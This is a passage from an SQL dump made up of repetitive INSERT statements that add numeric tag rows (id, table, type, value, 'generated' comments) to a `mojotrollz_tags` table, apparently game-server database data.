1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176216, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176216, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176216, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176217, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176217, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176217, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176217, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176224, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176224, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176224, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176224, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176225, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176226, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176227, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176228, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176229, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176230, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176232, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176233, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176234, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176235, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176236, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176237, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176238, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176239, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176240, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176241, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176242, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176243, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176245, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176245, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176245, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176245, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176248, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176248, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176248, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176248, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176249, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176249, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176249, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176249, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176264, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176266, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176267, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176268, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176269, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176270, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176271, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176272, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176273, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176274, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176275, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176276, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176277, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176278, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176279, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176280, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176281, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176282, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176283, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176284, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176285, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176286, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176287, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176288, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176289, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176290, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176291, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176292, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176293, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176294, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176304, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176304, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176304, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176304, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176305, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176306, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176307, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176307, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176307, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176307, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176308, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176308, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176308, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176308, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176309, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176309, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176309, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176309, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176311, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176312, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176313, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176314, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176315, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176316, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176317, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176318, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176319, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176324, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176325, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176325, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176325, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176325, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176326, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176327, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176327, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176327, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176327, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176344, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176346, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176346, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176346, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176346, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176348, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176349, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176349, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176349, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176349, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176350, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176350, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176350, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176350, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176351, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176351, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176351, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176351, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176352, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176352, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176352, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176352, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176353, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176353, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176353, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176353, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176356, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176360, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176360, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176360, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176360, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176361, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176364, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176365, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176369, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176370, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176389, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176390, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176392, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176393, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176404, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176424, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176424, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176424, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176424, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176425, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176426, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176427, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176428, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176429, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176430, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176431, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176432, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176433, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176434, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176435, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176436, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176437, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176438, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176439, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176440, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176441, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176442, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176443, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176444, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176445, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176446, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176447, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176448, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176449, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176450, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176451, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176452, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176454, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176455, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176456, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176457, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176458, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176459, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176460, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176461, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176462, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176463, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176464, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176484, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176485, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176486, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176487, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176488, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176489, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176490, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176491, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176492, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176493, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176496, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176504, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176506, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176507, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176508, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176509, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176511, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176511, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176511, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176511, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176513, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176513, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176513, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176513, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176514, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176514, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176514, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176514, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176515, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176515, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176515, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176515, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176516, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176517, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176518, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176519, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176520, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176521, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176544, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176545, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176549, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176550, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176551, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176552, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176553, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176554, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176555, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176556, 2, 1, 